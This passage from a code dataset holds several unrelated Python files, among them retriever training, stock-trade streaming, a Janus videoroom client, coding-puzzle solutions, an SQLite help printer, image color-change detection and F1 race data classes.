Other positive passages within a single batch becomes negatives given the pos passage.\nWe do not mine hard negatives or train triplets in this example.\n'''\nimport pathlib, os\nimport logging\nimport wandb\n\nfrom typing import Dict, Type, List, Callable, Iterable, Tuple\nfrom tqdm.autonotebook import trange\nfrom sentence_transformers.readers import InputExample\n\nfrom sentence_transformers import losses, models, SentenceTransformer\n\nfrom beir import util, LoggingHandler\nfrom beir.datasets.data_loader import GenericDataLoader\nfrom beir.retrieval.train import TrainRetriever\n\n#### Just some code to print debug information to stdout\nlogging.basicConfig(format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO,\n handlers=[LoggingHandler()])\n#### /print debug information to stdout\n\n\ndef train(corpus, queries, qrels, dev_corpus, dev_queries, dev_qrels, model_name=\"xlm-roberta-base\", train_loss='cosine', pretrained_model=True):\n\n dev_available = False\n if dev_corpus is not None and dev_queries is not None and dev_qrels is not None:\n dev_available = True\n\n dataset = 'doc2doc'\n\n #### Provide any sentence-transformers or HF model\n if not pretrained_model:\n #word_embedding_model = models.Transformer(model_name, max_seq_length=350)\n word_embedding_model = models.Transformer(model_name, max_seq_length=512)\n pooling_model = models.Pooling(word_embedding_model.get_word_embedding_dimension())\n model = SentenceTransformer(modules=[word_embedding_model, pooling_model])\n print(\"successfully created model\")\n \n #### Or provide pretrained sentence-transformer model\n else:\n model = SentenceTransformer(model_name)\n\n retriever = TrainRetriever(model=model, batch_size=16)\n\n \"\"\"\n word_embedding_model = models.Transformer('bert-base-uncased', max_seq_length=256)\n pooling_model = models.Pooling(word_embedding_model.get_word_embedding_dimension())\n \n model = SentenceTransformer(modules=[word_embedding_model, pooling_model])\n \n \n word_embedding_model = models.Transformer('bert-base-uncased', max_seq_length=256)\n pooling_model = models.Pooling(word_embedding_model.get_word_embedding_dimension())\n dense_model = models.Dense(in_features=pooling_model.get_sentence_embedding_dimension(), out_features=256, activation_function=nn.Tanh())\n \n model = SentenceTransformer(modules=[word_embedding_model, pooling_model, dense_model])\n \"\"\"\n\n #### Prepare training samples\n train_samples = retriever.load_train(corpus, queries, qrels)\n print(\"successfully load train\")\n train_dataloader = retriever.prepare_train(train_samples, shuffle=True)\n\n #### Training SBERT with cosine-product\n if train_loss == 'cosine':\n train_loss = losses.MultipleNegativesRankingLoss(model=retriever.model)\n #### training SBERT with dot-product\n else:\n train_loss = losses.MultipleNegativesRankingLoss(model=retriever.model, similarity_fct=util.dot_score)\n\n #### Prepare dev evaluator\n if dev_available:\n ir_evaluator = retriever.load_ir_evaluator(dev_corpus, dev_queries, dev_qrels)\n #### If no dev set is present from above use dummy evaluator\n else:\n ir_evaluator = retriever.load_dummy_evaluator()\n\n #### Provide model save path\n model_save_path = os.path.join(pathlib.Path(__file__).parent.absolute(), \"output\",\n \"{}-v1-{}\".format(model_name, dataset))\n os.makedirs(model_save_path, exist_ok=True)\n print(\"successfully created set up training\")\n\n #### Configure Train params\n num_epochs = 1\n evaluation_steps = 5000\n warmup_steps = 
int(len(train_samples) * num_epochs / retriever.batch_size * 0.1)\n\n retriever.fit(train_objectives=[(train_dataloader, train_loss)],\n evaluator=ir_evaluator,\n epochs=num_epochs,\n output_path=model_save_path,\n warmup_steps=warmup_steps,\n evaluation_steps=evaluation_steps,\n use_amp=True)\n\n\n","repo_name":"Stern5497/Doc2docBeirIR","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26538381278","text":"import pathlib\nimport sys\nfrom AlpacaStream.AlpacaDataStream import AlpacaDataStream\nfrom models import Quotes, Stocks, BarHour, BarMinute, BarDaily, Trades\nfrom helpers import insert_into_database\nimport pandas as pd\nimport logging\n\nlogger = logging.getLogger(\"__name__\")\nNY = 'America/New_York'\n\nasync def tradehandler(trades):\n \"\"\"\n Processes trade data received through AlpacaDataStream API and saves it to a database using helper functions.\n\n Args:\n trades: A trade object received from AlpacaDataStream API.\n\n Returns:\n None.\n \"\"\"\n print(trades.__dict__)\n trades_df = pd.DataFrame(trades.__dict__)\n trades_df = trades_df.transpose()\n trades_df['timestamp'] = pd.to_datetime(trades_df['timestamp'], unit='ns')\n trades_df.timestamp = trades_df.timestamp.dt.tz_localize('UTC').dt.tz_convert(NY)\n trades_df.rename(columns={\"symbol\":\"ticker\",\"id\":\"trade_id\"}, inplace=True)\n insert_into_database(Trades, trades_df.to_dict(orient=\"records\"))\n\ndef run_trades_stream(tickers):\n \"\"\"\n Initiates a stream of trade data using AlpacaDataStream API and processes the received data using the tradehandler() function.\n\n Args:\n tickers: A list of ticker symbols for which to receive trade data.\n\n Returns:\n None.\n \"\"\"\n alpaca_obj = AlpacaDataStream()\n try:\n print(\"streaming data for {} stocks\".format(len(tickers)))\n alpaca_obj.get_streams(\"trades\", tickers, tradehandler)\n logger.info(\"streaming trades started\")\n except Exception as e:\n logger.error(\"there was some error streaming trades data \\n Error Details:{}\".format(e))\n raise e\n\nif __name__ == \"__main__\":\n symbols = [\"AAPL\", \"MSFT\"]\n run_trades_stream(symbols)\n\n\n\n \n\n\n","repo_name":"faisalanjum/Data-Alpaca","sub_path":"backend/db/stream_trades.py","file_name":"stream_trades.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2903731850","text":"import requests\nimport json\nimport random\nimport string\nimport time\n\napi = 'http://localhost:8088/janus'\n\n\ndef randomString(stringLength=8):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n\ndef call(data):\n data['transaction'] = randomString()\n return requests.post(api, data=json.dumps(data)).json()\n\n\ndef call_session(session, data):\n url = \"{}/{}\".format(api, session)\n data['transaction'] = randomString()\n return requests.post(url, data=json.dumps(data)).json()\n\n\ndef call_handle(session, handle, data):\n url = \"{}/{}/{}\".format(api, session, handle)\n data['transaction'] = randomString()\n return requests.post(url, data=json.dumps(data)).json()\n\n\ndef mk_session():\n return call({'janus': 'create'})['data']['id']\n\n\ndef mk_handle(session):\n return call_session(session, {'janus': 'attach', 'plugin': 'janus.plugin.videoroom'})['data']['id']\n\n\ndef get_events(session):\n url = 
\"{}/{}?maxev=1\".format(api, session)\n return requests.get(url).json()\n\n\ndef get_pub_ids(session, handle):\n response = call_handle(session, handle, {'janus': 'message', 'body': {\n 'request': 'listparticipants', 'room': 1234}})\n participants = response['plugindata']['data']['participants']\n return [part['id'] for part in participants if part['publisher'] == True]\n\n\ndef subscribe(session, handle, pubid):\n return call_handle(session, handle, {'janus': 'message', 'body': {\n 'request': 'join',\n 'ptype': 'subscriber',\n 'room': 1234,\n 'feed': pubid,\n 'video': True,\n }})\n\n\ndef join_pub(session, handle):\n return call_handle(session, handle, {'janus': 'message', 'body': {\n 'request': 'join',\n 'ptype': 'publisher',\n 'room': 1234,\n }})\n\n\ndef offer(session, handle, sdp):\n return call_handle(session, handle, {'janus': 'message', 'body': {\n 'request': 'configure',\n 'audio': True,\n 'video': True\n },\n 'jsep': {\n 'type': 'offer',\n 'trickle': False,\n 'sdp': sdp\n }\n })\n\n\ndef start_send(session, handle, sdp):\n return call_handle(session, handle, {'janus': 'message', 'body': {\n 'request': 'start',\n },\n 'jsep': {\n 'type': 'answer',\n 'sdp': sdp\n }\n })\n\n\ndef leave(session, handle):\n return call_handle(session, handle, {'janus': 'message', 'body': {'request': 'leave', }})\n\n\ndef detach(session):\n return call_session(session, {'janus': 'detach'})\n\n\nsession = mk_session()\nhandle = mk_handle(session)\npub_ids = get_pub_ids(session, handle)\nsubscribe(session, handle, pub_ids[0])\n\nsdp_offer = get_events(session)['jsep']['sdp']\n\npub_handle = mk_handle(session)\njoin_pub(session, pub_handle)\noffer(session, pub_handle, sdp_offer)\nprint('Send offer')\nget_events(session)\nsdp_answer = get_events(session)['jsep']['sdp']\nstart_send(session, handle, sdp_answer)\n\nfor x in range(2):\n print(get_events(session))\n\ntime.sleep(10)\nleave(session, pub_handle)\nleave(session, handle)\ndetach(session)\n","repo_name":"software-mansion-labs/janus_experiments","sub_path":"videoroom_loop.py","file_name":"videoroom_loop.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38887506767","text":"def observed():\n observations=[]\n for i in range (6):\n temp=input(\"add an item to the list\\n\")\n observations.append(temp)\n return observations\n\ndef run():\n print(f\"Counting observations\")\n observations=observed()\n observations_set = set()\n for observation in observations:\n data = (observation, observations.count(observation))\n observations_set.add(data)\n for data in observations_set:\n print(f\"{data[0]} observed {data[1]} times.\")\n\nif \"__main__\":\n run()\n","repo_name":"Will-2332/COM411","sub_path":"data/sets/set_from_list.py","file_name":"set_from_list.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33098828688","text":"\"\"\"\n String Compression\n Cracking the coding interview, 6th edition, page 91\n\"\"\"\n\n\nclass StringCompression:\n def __init__(self, string: str) -> None:\n self.string = string\n\n def compress(self) -> str:\n if len(self.string) <= 2:\n return self.string\n list_string: list[str] = list(self.string)\n list_compress: list[str or int] = list()\n count_char: int = 0\n for i in range(len(list_string)):\n count_char += 1\n if i + 1 >= len(list_string) or list_string[i] != list_string[i+1]:\n 
list_compress.extend([list_string[i], str(count_char)])\n count_char = 0\n if len(list_string) <= len(list_compress):\n return self.string\n return ''.join(list_compress)\n\n","repo_name":"Hesam-Eskandari/CrackingCodingInterview-Python","sub_path":"ArraysAndStrings/string_compression.py","file_name":"string_compression.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31691939772","text":"import string\n\n# this will probably be GODJUL, let's check.\ninp = 90101894\nletters = ''\n\nwhile 1:\n l = inp % 26\n letters = string.ascii_uppercase[l-1] + letters\n\n if inp < 26:\n break\n\n inp //= 26\n\nprint(letters)","repo_name":"matslindh/codingchallenges","sub_path":"knowit2016/knowit24.py","file_name":"knowit24.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"14647524025","text":"class Error:\n def __init__(\n self, exception: str,\n module: str, url: str,\n msg: str, status_code: int\n ):\n \"\"\"\n :param exception: An exception\n :param module: A module where an exception occurred\n :param url: A url of parsed resource\n :param msg: A message with additional information\n :param status_code: A status code of request\n \"\"\"\n\n self.exception = exception\n self.module = module\n self.msg = msg\n self.url = url\n self.status_code = status_code\n\n def json(self, ) -> dict[str, str]:\n return {\n \"msg\": self.msg,\n \"type\": self.exception,\n \"module\": self.module,\n \"url\": self.url,\n \"status_code\": self.status_code\n }\n","repo_name":"DmitriDanshin/deutsche-sprache","sub_path":"utils/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34957946698","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'countingValleys' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER steps\n# 2. 
STRING path\n#\n\ndef countingValleys(steps, path):\n stack = []\n flag = -1\n valleys = 0\n for i in range(steps):\n if (path[i] == 'U' and len(stack) == 0):\n stack.append(0)\n flag = 0\n elif (path[i] == 'D' and len(stack) == 0):\n stack.append(1)\n flag = 1\n elif (path[i] == 'D' and flag == 0):\n stack.pop()\n elif (path[i] == 'U' and flag == 0):\n stack.append(1)\n elif (path[i] == 'D' and flag == 1):\n stack.append(1)\n elif (path[i] == 'U' and flag == 1):\n stack.pop()\n if(flag == 1 and len(stack) == 0):\n valleys = valleys + 1\n return valleys\n\nif __name__ == '__main__':\n fptr = sys.stdout\n\n steps = int(input().strip())\n\n path = input()\n\n result = countingValleys(steps, path)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n\n","repo_name":"abinezer/HackerRank-Problem-Solving","sub_path":"prep/CountingValleys.py","file_name":"CountingValleys.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17190671551","text":"# Given inorder and postorder traversal of a tree, construct the binary tree.\n# Note:\n# You may assume that duplicates do not exist in the tree.\n# For example, given\n# inorder = [9,3,15,20,7]\n# postorder = [9,15,7,20,3]\n# Return the following binary tree:\n\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def buildTree(self, inorder, postorder):\n \"\"\"\n :type inorder: List[int]\n :type postorder: List[int]\n :rtype: TreeNode\n \"\"\"\n return self.buildTreeRec(0,\n len(postorder) - 1, 0,\n len(inorder) - 1, inorder, postorder)\n\n def buildTreeRec(self, postStart, postEnd, inStart, inEnd, inorder,\n postorder):\n # print('inStart = {}, inEnd = {}, postEnd = {}'.format(\n # inStart, inEnd, postEnd))\n if postStart > postEnd or inStart > inEnd:\n return None\n\n root = TreeNode(postorder[postEnd])\n for i in range(inStart, inEnd + 1):\n if root.val == inorder[i]:\n inMid = i\n # print('inMid = ', inMid)\n break\n\n # postStart remains same, inMid-inStart gives number of elem in left subtree\n # postEnd index should be one less than the number of items in left subtree such that \n # postStart..postEnd index correctly represent left subtree in post order traversal.\n # postEnd = postStart + inMid - inStart -1\n root.left = self.buildTreeRec(postStart,\n postStart + inMid - inStart - 1, inStart,\n inMid - 1, inorder, postorder)\n\n # postEnd is reduced by one because that's the end of the right subtree. To find the start of the right subtree\n # postStart is incremented by number of items in between inMid and inStart i.e. 
\n # postStart = postStart + inMid - inStart\n root.right = self.buildTreeRec(postStart + inMid - inStart,\n postEnd - 1, inMid + 1, inEnd, inorder,\n postorder)\n return root\n\n\ndef main():\n inorder = [9, 3, 15, 20, 7]\n postorder = [9, 15, 7, 20, 3]\n root = Solution().buildTree(inorder, postorder)\n\n\nif __name__ == '__main__':\n main()","repo_name":"gauravtatke/codetinkering","sub_path":"leetcode/LC106_bintree_from_postorder_inorder.py","file_name":"LC106_bintree_from_postorder_inorder.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7642271932","text":"# fix the python search path so modules in other sub directories can be imported\nimport sys\nimport os\ncurrent_working_directory = os.getcwd()\nsys.path.append(current_working_directory)\n\n############################################################################\n\n\ndef sqlite_help():\n help = \"\"\n\n # header\n header = \"\\n\"\n header += \" SQLite Help :\"\n header += \"\\n\"\n header += \"\\n\"\n\n # data type\n data_type = \"\\n\"\n data_type += \" data_type\"\n data_type += \"\\n\"\n data_type += \" SQLite has 5 data types : NULL, INTEGER, REAL, TEXT, BLOB\"\n data_type += \"\\n\"\n data_type += \" REAL : The value is a floating point value, stored as an 8-byte IEEE floating point number.\"\n data_type += \"\\n\"\n data_type += \" BLOB : The value is a blob of data, stored exactly as it was input.\"\n data_type += \"\\n\"\n data_type += \"\\n\"\n\n # Show tables\n show_tables = \"\\n\"\n show_tables += \" show all tables with structures\"\n show_tables += \"\\n\"\n show_tables += \" tables\"\n show_tables += \"\\n\"\n show_tables += \"\\n\"\n\n\n\n # Select\n select = \"\\n\"\n select += \" Select\"\n select += \"\\n\"\n select += \" SELECT * FROM TableName\"\n select += \"\\n\"\n select += ' SELECT * FROM employees WHERE last=?\", (\"Schafer\",)'\n select += \"\\n\"\n select += ' SELECT * FROM employees WHERE last=:last\", {\"last\": \"Doe\"}'\n select += \"\\n\"\n select += \"\\n\"\n\n # show all tables\n all_tables = \"\\n\"\n all_tables += \" show all tables\"\n all_tables += \"\\n\"\n all_tables += \" SELECT * FROM sqlite_master where type='table';\"\n all_tables += \"\\n\"\n all_tables += \"\\n\"\n\n # show special table\n special_table = \"\\n\"\n special_table += \" show a special table\"\n special_table += \"\\n\"\n special_table += \" show tableName\"\n special_table += \"\\n\"\n special_table += \" exp : show EDL_DATE_FORMAT\"\n special_table += \"\\n\"\n special_table += \"\\n\"\n\n\n # Insert\n insert_db = \"\\n\"\n insert_db += \" Insert\"\n insert_db += \"\\n\"\n insert_db += \" Suggested format :\"\n insert_db += \"\\n\"\n insert_db += ' INSERT INTO people (first_name, last_name) VALUES (\"John\", \"Smith\");'\n insert_db += \"\\n\"\n insert_db += \" Other format :\"\n insert_db += \"\\n\"\n insert_db += \" INSERT INTO EDL_DATE_FORMAT VALUES (1, 'feedName', 'cus_date', 'YYYYMMDD', 'file')\"\n insert_db += \"\\n\"\n insert_db += \" insert data with python class :\"\n insert_db += \"\\n\"\n insert_db += \" emp_1 = Employee('John', 'Doe', 80000)\"\n insert_db += \"\\n\"\n insert_db += ' \"INSERT INTO employees VALUES (?, ?, ?)\", (emp_1.first, emp_1.last, emp_1.pay)'\n insert_db += \"\\n\"\n insert_db += ' \"INSERT INTO employees VALUES (:first, :last, :pay)\", \"{\"first\": emp_1.first, \"last\": emp_1.last, \"pay\": emp_1.pay}'\n insert_db += \"\\n\"\n insert_db += 
\"\\n\"\n\n # Update\n update_db = \"\\n\"\n update_db += \" Update\"\n update_db += \"\\n\"\n update_db += \" UPDATE table_name SET column_name = 'something' WHERE condition;\"\n update_db += \"\\n\"\n update_db += \" UPDATE employeesSET lastname = 'Smith' WHERE employeeid = 3;\"\n update_db += \"\\n\"\n update_db += \"\\n\"\n\n # delete\n delete_db = \"\\n\"\n delete_db += \" delete\"\n delete_db += \"\\n\"\n delete_db += \" drop table main.tableName\"\n delete_db += \"\\n\"\n delete_db += \"\\n\"\n\n\n\n help += header\n help += data_type\n help += show_tables\n help += special_table\n help += select\n help += all_tables\n help += insert_db\n help += update_db\n help += delete_db\n\n print(help)\n\n\n############################################################################\n\nif __name__ == \"__main__\":\n sqlite_help()","repo_name":"saha-arjmand/monitoring_system","sub_path":"script_modules/subscript/db/sqlite_help/sqlite_help.py","file_name":"sqlite_help.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"24541449109","text":"import cv2\r\nfrom skimage.measure import compare_ssim\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as imgs\r\nimport imutils\r\n\r\nOriginal = cv2.imread('origin_2.jpg')\r\nChanged = cv2.imread('aligned.jpg')\r\n\r\n# changed = cv2.resize(changed, (original.shape[1], original.shape[0]), interpolation=cv2.INTER_CUBIC)\r\n#original_gray = cv2.cvtColor(original, cv2.COLOR_BGR2GRAY)\r\n#changed_gray = cv2.cvtColor(changed, cv2.COLOR_BGR2GRAY)\r\n\r\nlower_gray = np.array([25, 25, 25], dtype = \"uint8\")\r\nupper_gray = np.array([151, 151, 151], dtype = \"uint8\")\r\nupper_gray_2 = np.array([185, 185, 185], dtype = \"uint8\")\r\n\r\nmask_1 = cv2.inRange(Original, lower_gray, upper_gray)\r\nmask_2 = cv2.inRange(Changed, lower_gray, upper_gray_2)\r\n\r\n# remove the background from the image\r\n\r\nmasked_image_1 = np.copy(Original)\r\nmasked_image_2 = np.copy(Changed)\r\nmasked_image_1[mask_1 != 0] = [0, 0, 0]\r\nmasked_image_2[mask_2 != 0] = [0, 0, 0]\r\n\r\n\r\ngreen = cv2.subtract(masked_image_1, masked_image_2)\r\n\r\nlower_green = np.array([0, 20, 30])\r\nupper_green = np.array([0, 100, 100])\r\n\r\n# convert the color to grayscale kont bgrab 7aga :D\r\noriginal_gray = cv2.cvtColor(Original, cv2.COLOR_BGR2GRAY)\r\nchanged_gray = cv2.cvtColor(Changed, cv2.COLOR_BGR2GRAY)\r\n\r\n# threshold byen mask1 wa mask2\r\n\r\nh, thresh = cv2.threshold(cv2.subtract(mask_1, mask_2), 200, 255, cv2.THRESH_BINARY)\r\ncnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\ncnts = imutils.grab_contours(cnts)\r\n\r\nfor c in cnts:\r\n # compute the bounding box of the contour and then draw\r\n # bounding box on both input images to represent where the two\r\n\r\n c = max(cnts, key=cv2.contourArea)\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n cv2.rectangle(Original, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n cv2.rectangle(Changed, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n\r\n\r\ncv2.imshow(\"original\", np.hstack([Original, Changed]))\r\n\r\ncv2.waitKey(0)\r\n","repo_name":"NadaAbbasMohamed/ROV-Competition","sub_path":"Task 1 - Color Detection Coral Reef Color Change/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6691507569","text":"import requests\r\n\r\nclass 
Carrera():\r\n def __init__(self, ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos):\r\n self.ronda = ronda\r\n self.nombre_carrera = nombre_carrera\r\n self.fecha_carrera = fecha_carrera\r\n self.mapa = mapa\r\n self.podio = podio\r\n self.asistencia = asistencia\r\n self.boletos_vendidos = boletos_vendidos\r\n self.mapa_vendidos = mapa_vendidos\r\n\r\n def leer_carrera():\r\n carrera_url = requests.get('https://raw.githubusercontent.com/Algorimtos-y-Programacion-2223-2/api-proyecto/main/races.json')\r\n carrera_url = carrera_url.json()\r\n lista_carrera=[]\r\n for x in carrera_url:\r\n carrera=Carrera(x['round'], x['name'], x['date'], x['map'], False, 0, 0, [])\r\n lista_carrera.append(carrera)\r\n return lista_carrera\r\n \r\n def mostrar_carrera(self):\r\n print(f' Ronda: {self.ronda}\\n Nombre de la carrera: {self.nombre_carrera}\\n Fecha de carrera: {self.fecha_carrera}\\n\\n\\n\\n')\r\n\r\n\r\nclass Circuito(Carrera):\r\n def __init__(self, ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, id_circuito, nombre_circuito):\r\n super().__init__(ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos)\r\n self.id_circuito = id_circuito\r\n self.nombre_circuito = nombre_circuito\r\n\r\n def leer_circuito():\r\n carrera_url = requests.get('https://raw.githubusercontent.com/Algorimtos-y-Programacion-2223-2/api-proyecto/main/races.json')\r\n carrera_url = carrera_url.json()\r\n lista_circuito=[]\r\n for x in carrera_url:\r\n circ= x['circuit']\r\n circuito=Circuito(x['round'], x['name'], x['date'], x['map'], False, 0, 0, [], circ['circuitId'], circ['name'])\r\n lista_circuito.append(circuito)\r\n return lista_circuito\r\n \r\n def mostrar_circuito(self):\r\n print(f' Ronda: {self.ronda}\\n Nombre de la carrera: {self.nombre_carrera}\\n Fecha de carrera: {self.fecha_carrera}\\n ID de circuito: {self.id_circuito}\\n Nombre de circuito: {self.nombre_circuito}\\n\\n\\n\\n')\r\n \r\n\r\nclass Location(Circuito):\r\n def __init__(self, ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, id_circuito, nombre_circuito, latitud, longitud, location_circuito, pais):\r\n super().__init__(ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, id_circuito, nombre_circuito)\r\n self.latitud = latitud\r\n self.longitud = longitud\r\n self.location_circuito = location_circuito\r\n self.pais = pais\r\n \r\n def leer_location():\r\n carrera_url = requests.get('https://raw.githubusercontent.com/Algorimtos-y-Programacion-2223-2/api-proyecto/main/races.json')\r\n carrera_url = carrera_url.json()\r\n lista_location=[]\r\n for x in carrera_url:\r\n loc= x['circuit']['location']\r\n circ= x['circuit']\r\n location=Location(x['round'], x['name'], x['date'], x['map'], False, 0, 0, [], circ['circuitId'], circ['name'], loc['lat'], loc['long'], loc['locality'], loc['country'])\r\n lista_location.append(location)\r\n return lista_location\r\n \r\n def mostrar_location(self):\r\n print(f' Ronda: {self.ronda}\\n Nombre de la carrera: {self.nombre_carrera}\\n Fecha de carrera: {self.fecha_carrera}\\n ID de circuito: {self.id_circuito}\\n Nombre de circuito: {self.nombre_circuito}\\n Pais: {self.pais}\\n Localidad: {self.location_circuito}\\n Latitud: {self.latitud}\\n Longitud: {self.longitud}\\n\\n\\n\\n')\r\n \r\n\r\n\r\nclass Restaurante(Carrera):\r\n def __init__(self, ronda, nombre_carrera, fecha_carrera, 
mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, nombre_restaurante):\r\n super().__init__(ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos)\r\n self.nombre_restaurante = nombre_restaurante\r\n\r\n def leer_restaurante():\r\n carrera_url = requests.get('https://raw.githubusercontent.com/Algorimtos-y-Programacion-2223-2/api-proyecto/main/races.json')\r\n carrera_url = carrera_url.json()\r\n lista_restaurante=[]\r\n for x in carrera_url:\r\n rest= x['restaurants']\r\n restaurante=Restaurante(x['round'], x['name'], x['date'], x['map'], False, 0, 0, [], rest['name'])\r\n lista_restaurante.append(restaurante)\r\n return lista_restaurante\r\n \r\n def mostrar_restaurante(self):\r\n print(f' Ronda: {self.ronda}\\n Nombre de la carrera: {self.nombre_carrera}\\n Fecha de carrera: {self.fecha_carrera}\\n Nombre de restaurante: {self.nombre_restaurante}\\n\\n\\n\\n')\r\n \r\n\r\n\r\n\r\n\r\n\r\nclass Producto(Restaurante):\r\n def __init__(self, ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, nombre_restaurante, nombre_producto, tipo_producto, precio_producto):\r\n super().__init__(ronda, nombre_carrera, fecha_carrera, mapa, podio, asistencia, boletos_vendidos, mapa_vendidos, nombre_restaurante)\r\n self.nombre_producto = nombre_producto\r\n self.tipo_producto = tipo_producto\r\n self.precio_producto = precio_producto\r\n\r\n def leer_producto():\r\n carrera_url = requests.get('https://raw.githubusercontent.com/Algorimtos-y-Programacion-2223-2/api-proyecto/main/races.json')\r\n carrera_url = carrera_url.json()\r\n lista_producto=[]\r\n for x in carrera_url:\r\n rest= x['restaurants']\r\n for r in rest:\r\n prod = r['items']\r\n for p in prod:\r\n producto=Producto(x['round'], x['name'], x['date'], x['map'], False, 0, 0, [], r['name'], p['name'], p['type'], p['price'])\r\n lista_producto.append(producto)\r\n return lista_producto\r\n\r\n\r\n\r\n\r\n def mostrar_producto(self):\r\n print(f' Nombre Restaurante: {self.nombre_restaurante}\\n Producto: {self.nombre_producto}\\n Tipo de producto: {self.tipo_producto}\\n Precio: {self.precio_producto}\\n\\n\\n\\n')\r\n ","repo_name":"GianmarcoCarniglia/proyecto","sub_path":"carrera.py","file_name":"carrera.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35405325981","text":"def only_brackets(str):\n aim_list=[\"(\",\")\",\"[\",\"]\",\"{\",\"}\",\"<\",\">\"]\n str_list=list(str)\n result_list=[]\n for i in str_list :\n if i in aim_list:\n result_list.append(i)\n return \"\".join(result_list)\ndef is_valid(str):\n stack=[]\n parent_map={\")\":\"(\",\"]\":\"[\",\"}\":\"{\",\">\":\"<\"}\n for c in str:\n if c not in parent_map:\n stack.append(c)\n elif not stack or parent_map[c] !=stack.pop():\n return 0\n return not stack\nnum=input()\nresult=[]\nfor i in range(int(num)):\n lineinput=input()\n onlyBrackets=only_brackets(lineinput)\n answer=is_valid(onlyBrackets)\n result.append(int(answer))\nprint(*result)\n\n\n\n","repo_name":"WitcherOfFire/Codepractise","sub_path":"19括号匹配/19.py","file_name":"19.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35069638185","text":"#!/usr/bin/env python\n\ngroups = [\n 'Chloe',\n \"Antonio's\",\n 'Mikes',\n 'Korean Fried Chicken',\n 'Soban',\n \"Durk's\",\n 'Heng',\n 'Den Den Cafe',\n \"Harry's burger\",\n 'East Side pockets',\n 'Skewers',\n 
'Wongs kitchen',\n 'Flatbread',\n 'Kabob and Curry',\n 'Bajas',\n 'Meeting Street Cafe',\n 'Yans cuisine'\n ]\n\niteration = 0\nrecurrence = 0\n\nwhile True:\n iteration += 1\n import random\n secure_random = random.SystemRandom()\n\n a = secure_random.choice(groups)\n b = random.choice(groups)\n c = random.choice(groups)\n d = secure_random.choice(groups)\n\n if a == b == c == d:\n recurrence += 1\n if recurrence == 2:\n print('After %s iterations, restaurant chosen is %s.' % (iteration, a))\n break\n","repo_name":"muammar/pickarestaurantforme","sub_path":"restaurants.py","file_name":"restaurants.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12877003685","text":"import json\nfrom streamlit_echarts import Map\nfrom streamlit_echarts import JsCode\nfrom streamlit_echarts import st_echarts\n\n\ndef render_usa():\n formatter = JsCode(\n \"function (params) {\"\n + \"var value = (params.value + '').split('.');\"\n + \"value = value[0].replace(/(\\d{1,3})(?=(?:\\d{3})+(?!\\d))/g, '$1,');\"\n + \"return params.seriesName + '
